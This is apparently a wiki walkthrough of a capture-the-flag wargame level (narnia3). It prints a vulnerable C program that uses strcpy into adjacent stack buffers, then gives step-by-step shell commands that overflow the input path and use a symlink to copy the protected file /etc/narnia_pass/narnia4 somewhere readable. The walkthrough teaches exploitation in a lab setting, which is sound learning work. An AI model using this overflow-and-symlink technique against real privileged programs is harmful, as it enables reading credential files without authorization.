Narnia3 - narnia4

From JaxHax
Jump to navigation Jump to search


//narnia3@melinda:/narnia$ cat narnia3.c 
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h> 

int main(int argc, char **argv){
        int  ifd,  ofd;
        char ofile[16] = "/dev/null";
        char ifile[32];
        char buf[32];
        if(argc != 2){
                printf("usage, %s file, will send contents of file 2 /dev/null\n",argv[0]);
        /* open files */
        strcpy(ifile, argv[1]);
        if((ofd = open(ofile,O_RDWR)) < 0 ){
                printf("error opening %s\n", ofile);
        if((ifd = open(ifile, O_RDONLY)) < 0 ){
                printf("error opening %s\n", ifile);
        /* copy from file1 to file2 */
        read(ifd, buf, sizeof(buf)-1);
        write(ofd,buf, sizeof(buf)-1);
        printf("copied contents of %s to a safer place... (%s)\n",ifile,ofile);
        /* close 'em */


Okay, This one seems interesting... It looks like by design it will read in data from a user specified file and write it to the value in ofile which is hardcoded to "/dev/null" with these two variables:

char ofile[16] = "/dev/null";
char ifile[32];

the value for ifile is read in via argv[1] using strcpy(). This is a Buffer Overflow, however it doesn't grant us EIP control since all pathes point to exit(). However we should still be able to overwrite ofile. They are created so in memory it should be structured like:

|              |lower addresses  <=== Exact pointer to this section in ifile
|  ifile[32]   |
|              | string data flows down.
|              |
|              |  <=== Exact pointer to this section in ofile
|  ofile[16]   |
|______________|Higher addresses

So it seems we could use a long string here, make it read but one string has to satisfy both file strings. (e.g. we need ofile to point to somewhere in temp, while ifile points to /etc/narnia_pass/narnia4, but in a way to trigger the buffer overflow, so probably a symlink in tmp somewhere).So the infile will be the entire string where ofile will be infile at the offset after 32 bytes.

First let's make a global writable folder in temp for the ofile to go to.

narnia3@melinda:/narnia$ cd /tmp/

narnia3@melinda:/tmp$ mkdir allmine

narnia3@melinda:/tmp$ chmod 777 allmine

narnia3@melinda:/tmp$ cd allmine

next we need to generate an overflow string. This will be 32 bytes. This will need to be a valid directory to make in the tmp directory:

narnia3@melinda:/tmp/allmine$ perl -e 'print "/tmp/"; print "T"x27; print "\n"' # "/tmp/" is 5 long. 32 - 5 = 27. 

Now make that a directory and make it globally accessible.

narnia3@melinda:/tmp/allmine$ mkdir /tmp/TTTTTTTTTTTTTTTTTTTTTTTTTTT

narnia3@melinda:/tmp/allmine$ chmod 777 /tmp/TTTTTTTTTTTTTTTTTTTTTTTTTTT

Now we need to emulate the path to overflow ofile with in this string.

narnia3@melinda:/tmp/allmine$ mkdir /tmp/TTTTTTTTTTTTTTTTTTTTTTTTTTT/tmp 

narnia3@melinda:/tmp/allmine$ mkdir /tmp/TTTTTTTTTTTTTTTTTTTTTTTTTTT/tmp/allmine/

Now that we have this we need to symlink to the file we want to read, this needs to be under 16 bytes to respect buffer size.

narnia3@melinda:/tmp/allmine$ ln -s /etc/narnia_pass/narnia4 /tmp/TTTTTTTTTTTTTTTTTTTTTTTTTTT/tmp/allmine/hi

narnia3@melinda:/tmp/allmine$ /narnia/narnia3 /tmp/TTTTTTTTTTTTTTTTTTTTTTTTTTT/tmp/allmine/hi
error opening /tmp/allmine/hi

Error... Hmmm... let's just make sure that chmod took and just for giggles, let's touch the file so it exist.

narnia3@melinda:/tmp/allmine$ cd ..

narnia3@melinda:/tmp$ chmod 777 allmine

narnia3@melinda:/tmp$ cd allmine

narnia3@melinda:/tmp/allmine$ ls

narnia3@melinda:/tmp/allmine$ touch hi

Now let's try this again...

narnia3@melinda:/tmp/allmine$ /narnia/narnia3 /tmp/TTTTTTTTTTTTTTTTTTTTTTTTTTT/tmp/allmine/hi
copied contents of /tmp/TTTTTTTTTTTTTTTTTTTTTTTTTTT/tmp/allmine/hi to a safer place... (/tmp/allmine/hi)

Like the way that execution went well!!! Let's see what we got.

narnia3@melinda:/tmp/allmine$ ls

narnia3@melinda:/tmp/allmine$ cat hi